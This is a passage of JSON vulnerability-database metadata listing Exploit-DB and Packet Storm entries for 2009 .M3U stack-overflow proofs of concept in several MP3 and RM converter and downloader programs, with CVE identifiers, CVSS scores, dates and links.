CVE-2009-1324,CVE-2009-1325,CVE-2009-1326,CVE-2009-1327,CVE-2009-1328,CVE-2009-1329,CVE-2009-1330. D...", "published": "2009-04-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8402/", "cvelist": ["CVE-2009-1327", "CVE-2009-1325", "CVE-2009-1326", "CVE-2009-1329", "CVE-2009-1330", "CVE-2009-1324", "CVE-2009-1328"], "lastseen": "2016-02-01T04:26:47"}, {"id": "EDB-ID:8403", "type": "exploitdb", "title": "WM Downloader - .M3U Local Stack Overflow PoC", "description": "WM Downloader (.M3U File) Local Stack Overflow PoC. CVE-2009-1324,CVE-2009-1325,CVE-2009-1326,CVE-2009-1327,CVE-2009-1328,CVE-2009-1329,CVE-2009-1330. Dos ex...", "published": "2009-04-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8403/", "cvelist": ["CVE-2009-1327", "CVE-2009-1325", "CVE-2009-1326", "CVE-2009-1329", "CVE-2009-1330", "CVE-2009-1324", "CVE-2009-1328"], "lastseen": "2016-02-01T04:26:54"}, {"id": "EDB-ID:8407", "type": "exploitdb", "title": "ASX to MP3 Converter - .M3U Local Stack Overflow PoC", "description": "ASX to MP3 Converter (.M3U File) Local Stack Overflow PoC. CVE-2009-1324,CVE-2009-1325,CVE-2009-1326,CVE-2009-1327,CVE-2009-1328,CVE-2009-1329,CVE-2009-1330....", "published": "2009-04-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8407/", "cvelist": ["CVE-2009-1327", "CVE-2009-1325", "CVE-2009-1326", "CVE-2009-1329", "CVE-2009-1330", "CVE-2009-1324", "CVE-2009-1328"], "lastseen": "2016-02-01T04:27:26"}, {"id": "EDB-ID:8404", "type": "exploitdb", "title": "RM Downloader - .M3U Local Stack Overflow PoC", "description": "RM Downloader (.M3U File) Local Stack Overflow PoC. CVE-2009-1324,CVE-2009-1325,CVE-2009-1326,CVE-2009-1327,CVE-2009-1328,CVE-2009-1329,CVE-2009-1330. Dos ex...", "published": "2009-04-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8404/", "cvelist": ["CVE-2009-1327", "CVE-2009-1325", "CVE-2009-1326", "CVE-2009-1329", "CVE-2009-1330", "CVE-2009-1324", "CVE-2009-1328"], "lastseen": "2016-02-01T04:27:03"}, {"id": "EDB-ID:8405", "type": "exploitdb", "title": "Mini-stream RM-MP3 Converter - .M3U Local Stack Overflow PoC", "description": "Mini-stream RM-MP3 Converter (.M3U File) Local Stack Overflow PoC. CVE-2009-1324,CVE-2009-1325,CVE-2009-1326,CVE-2009-1327,CVE-2009-1328,CVE-2009-1329,CVE-20...", "published": "2009-04-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8405/", "cvelist": ["CVE-2009-1327", "CVE-2009-1325", "CVE-2009-1326", "CVE-2009-1329", "CVE-2009-1330", "CVE-2009-1324", "CVE-2009-1328"], "lastseen": "2016-02-01T04:27:12"}], "packetstorm": [{"id": "PACKETSTORM:137456", "type": "packetstorm", "title": "Easy RM To MP3 Converter 2.7.3.700 Universal DEP + ASLR Bypass", "description": "", "published": "2016-06-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/137456/Easy-RM-To-MP3-Converter-2.7.3.700-Universal-DEP-ASLR-Bypass.html", "cvelist": ["CVE-2009-1330"], "lastseen": "2016-12-05T22:11:46"}]}}